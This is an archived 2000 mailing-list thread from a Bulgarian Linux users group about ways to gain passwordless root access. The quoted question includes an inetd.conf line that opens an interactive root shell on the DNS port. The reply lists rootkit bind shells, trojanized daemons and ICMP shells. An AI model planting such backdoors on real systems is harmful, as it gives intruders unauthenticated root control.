Linux-Bulgaria.ORG
навигация

 

начало

пощенски списък

архив на групата

семинари ...

документи

как да ...

 

 

Предишно писмо Следващо писмо Предишно по тема Следващо по тема По Дата По тема (thread)

Re: lug-bg: security


  • Subject: Re: lug-bg: security
  • From: famzah@xxxxxxxxxx (Ivan Zahariev)
  • Date: Sat, 02 Dec 2000 14:01:12 +0200



Angel Radovanov wrote:

> Vyprosyt mi e svyrzan s sigurnosta, i po tochno s tova kak moze user na se logne v sistemata bez pass i s root prava. Ineteresuvam se po kolko nachina moze da se napravi tova.
> Az se sshtam samo za edin i toj e:
> v /etc/inetd.conf dobaviame:
>
> domain stream tcp nowait root /usr/local/bin/bash bash -i
>
> Izbrah domain zashtoto naj-chesto ne se filtrira.
> Ako niakoj ot ima drugi idej da kaze .....
>
> ==================================================================
> A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers)
> Otpiswaneto RABOTI !!! : Majordomo@xxxxxxxxxxxxxxxxxx UNSUBSCRIBE LUG-BG
> http://www.linux-bulgaria.org/ Hosted by Internet Group Ltd. - Stara Zagora

heh :)
ako imash vuln. daemon pusnat ot root (obiknoveno named, ftpd, etc) kato go hackne s nekoi exploit pak ste si e root i to bez da pishe parola.
drug na4in da se vurne (kato te e hacknal) e da ti trojanizira goliama 4ast ot daemonite pusnati pod root (ili samia kernel dori)
a i ne vijdam sto triabva zaduljitelno prez inetd.conf da si otvaria sh. moje i da si pusne otdelna pragrama. v rootkits ima bindshell.c se kazva (v slu4ai 4e ps, pstree, etc sa
trojanizirani razbira se)
4estno da ti kaja, tvurde mnogo na4ini ima da se vurne/vleze kato root ako vednuj te e hacknal nekoi ili puk si sus stari vuln. programi (poniakoga dori e ujasno trudno da go
hvanesh, 4e ti buta mashinata, ako naprimer e vliazul prez ICMP shell - w00w00 razrabotka naprimer)
vurvi pro4eti http://www.securityfocus.com Ima interesni statii za security, niakoi sa osobeno polezni.

Regards, famzah

==================================================================
A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers)
Otpiswaneto RABOTI !!! : Majordomo@xxxxxxxxxxxxxxxxxx UNSUBSCRIBE LUG-BG
http://www.linux-bulgaria.org/ Hosted by Internet Group Ltd. - Stara Zagora


  • Относно:

 

наши приятели

 

линукс за българи
http://linux-bg.org

FSA-BG
http://fsa-bg.org

OpenFest
http://openfest.org

FreeBSD BG
http://bg-freebsd.org

KDE-BG
http://kde.fsa-bg.org/

Gnome-BG
http://gnome.cult.bg/

проект OpenFMI
http://openfmi.net

NetField Forum
http://netField.ludost.net/forum/

 

 

Linux-Bulgaria.ORG

Mailing list messages are © Copyright their authors.